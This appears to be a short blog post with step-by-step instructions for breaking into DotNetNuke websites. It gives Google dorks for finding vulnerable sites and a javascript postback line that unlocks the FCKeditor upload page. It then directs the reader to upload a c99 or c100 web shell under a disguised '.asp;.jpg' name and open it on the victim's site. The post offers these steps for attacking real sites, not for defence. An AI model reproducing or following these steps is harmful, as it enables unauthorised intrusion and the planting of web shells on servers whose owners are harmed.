Step 1 : http://www.google.com
Step 2 : Now enter any of these dorks. 2nd dork is best for this type of hacking.
:inurl:/tabid/36/language/en-US/Default.aspx
:inurl:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.
Step 3 : You will find many sites, Select the site which you are comfortable with.
Step 4 : If you are using 1st dork replace
/Home/tabid/36/Language/en-US/Default.aspx
with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Note: if it will show you like this (see screenshot below) its mean site could not hack find another site
Step 5 : You will get a Link Gallary page.So far so good!
Step 6 : Dont do anything for now,wait for the next step...
Step 7 : Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 8 : You will Find the Upload Option
Step 9 : Select Root
Step 10 :Upload your package Your Shell c99,c100 etc etc
Step 11 : After upload go for your shell.
www.victimsite.com/portals/0/yourshellname.asp;.jpg
0 comments:
Post a Comment